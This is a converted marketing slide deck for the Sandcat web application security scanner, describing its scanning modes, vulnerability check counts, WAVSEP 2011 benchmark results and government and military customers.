Sandcat is a hybrid web application security assessment suite that performs both external and internal scans to identify vulnerabilities like XSS and SQLi. It has evaluated over 29,000 vulnerabilities across many web apps and platforms. Independent tests have found Sandcat to have the best detection rates for XSS vulnerabilities compared to other free and commercial tools.
2. Sandcat Assessment Suite
What is Sandcat?
P Sandcat is a hybrid multilanguage web
application security assessment suite
P A software suite that simulates web-based attacks
P Proactively guards an organization's Web
infrastructure against web application security
threats
< Finds the vulnerabilities before the hackers
3. Sandcat Assessment Suite
Evolution
P Initially an evasion-capable web server scanner
< With CGI/directory brute force scanning and a very
extensive database of checks. (2001-2003)
P Added spidering & injection capabilities.
< Became a remote web app sec scanner (2004)
P Added source code scanning capabilities (2008)
4. Sandcat Assessment Suite
How It Works
P Scans live websites for multiple classes of
vulnerabilities - an external pen-test
< This is the hacker’s perspective (aka blackbox)
P Scans locally, its source for the same multiple
classes of vulnerabilities - an internal code review
(aka whitebox)
P When it combines both approaches, you have
what is called a hybrid analysis (or greybox)
5. Sandcat Assessment Suite
Sandcat’s hybrid multilanguage web application security
scanning capabilities
External Internal
Remote Scanner Source Scanner
HTML5- JavaScript Scans
Aware Spider Emulation Any Web App
6. Features
Core Functionality
P Concurrency/Scan Queue Support (Multithreads)
P Deep Crawling (Spidering)
< Maps the entire web site structure (all links, forms,
XHR requests and other entry points)
P Multiple Versions (Windows Only)
< GUI (Graphical User Interface)
< CLI (Command-Line Interface)
< Web-Interface (Apache-Based)
7. Sandcat Assessment Suite
Core Functionality
P Report Generation
< Multiple formats and templates
< Compliance - OWASP Top 10, PHP Top 5,
CWE/SANS Top 25, Payment Card Industry (PCI),
etc. Also includes:
< OSVDB references
< CVE & CWE references
< Charts
8.
9. Vulnerability Coverage
Sandcat Database
P Over 460 remote web application security checks
in over 24 categories of web attacks
< XSS, SQL Injection, File Inclusion, Command
Execution, etc
P OWASP's Top Ten Most Critical Web
Application Security Vulnerabilities & PHP Top
5 Vulnerabilities
10. Vulnerability Coverage
Sandcat Database
P Over 561 source checks, covering several types
of web attacks:
< SQL Injection
– Both remote and source checks tailored to cover MySQL,
Oracle, PostgreSQL, Microsoft Access, Microsoft SQL
Server, SQLite, Firebird, Sybase...
< Cross-Site Scripting (XSS), Arbitrary File
Manipulation, Command Execution, File Inclusion
(Local & Remote) and more.
11. Vulnerability Coverage
Sandcat Database
P 29K (29 thousand) web vulnerabilities researched
since 2003 affecting specific web
applications/servers.
P Examples:
< StatPressCN Plugin for Wordpress wp-
admin/admin.php Multiple Parameter XSS (CVE-
2011-0641)
< PHPCMS 2008 data.php where_time Parameter SQL
Injection (CVE-2011-0645)
12. Additional Components
Other Sandcat Components
P Sandcat Log Analyzer
< Scans HTTP logs (created by web servers) for
intrusion attempts
P Sandcat Apache/PHP Hardener
< Scans Apache and PHP configuration files for weak
security settings
13. WAVSEP 2011 Comparison
WAVSEP Comparison
P Independent web application scanner accuracy
tests produced every year by Shay Chen (OWASP
Israel), an application security consultant
P The most comprehensive ever made (a total of 60
tools were included this year, including the
leading commercial tools)
P What did we find out?
14. WAVSEP 2011 Comparison
Sandcat Accuracy Tests (August 2011)
P We’ve the best XSS vulnerability detection rate
in the market
< #1 when the Free Edition of Sandcat is compared with
other free and open source tools
< #2 when Sandcat Pro is compared to other commercial
tools such as IBM AppScan, HP WebInspect and
others
– Sandcat Pro, AppScan and ParosPro top the WAVSEP
benchmark charts with 100 percent or near-100 percent XSS
detection rates
15.
16. WAVSEP 2011 Comparison
Sandcat Accuracy Tests (August 2011)
P SQL Injection (SQLi)
< Sandcat also scored a 100 percent error-based SQL
Injection detection rate
– Sandcat excelled at identifying an additional large set of 80
error-based SQL Injection vulnerabilities (detected 100% of
the vulnerabilities, both GET-based and POST-based)
– Sandcat’s SQL Injection checks covers several types of
databases
17. WAVSEP 2011 Comparison
Sandcat Accuracy Tests (August 2011)
P Sandcat scored a 100 percent detection rate
running at half its capabilities
< Sandcat’s white-box (source code) scanning
capabilities were not covered in the tests.
18. Additional Highlights
Standards & Additional Info
P Sandcat makes the list of CVE-compatible
products and services provided by the Mitre
Corporation who created the standard.
P Invited this year by the U.S. NIST (National
Institute of Standards and Technology) to
participate the Static Analysis Tool Exposition
(SATE)
< SATE’s goal: advance research in the field of static
analysis tools
19. Additional Highlights
Standards & Additional Info
P Used by the U.S. Department of Defense
P Listed and covered in the Information Assurance
Tools Report published this year (2011) by the
U.S. Department of Defense’s IATAC
(Information Assurance Technology Analysis
Center), alongside leading tools
20. Customers
Where they come from
P From over 26 countries. Mainly from the United
States, United Kingdom and Canada
P From different markets and industries
< Consulting, Education/Government, Finance, Banking,
and Insurance, High Technology & Software,
Hospitality, Travel & Tourism, Telecommunications,
etc
21. Customers
Where they come from (Government & Military)
P NASA, US NOAA, US DoE (Department of
Energy) and others
P US Navy, UK’s Royal Air Force
P Intelligence Agencies
< CSE (Canada’s intelligence agency)
< CISEN (Mexico’s intelligence agency)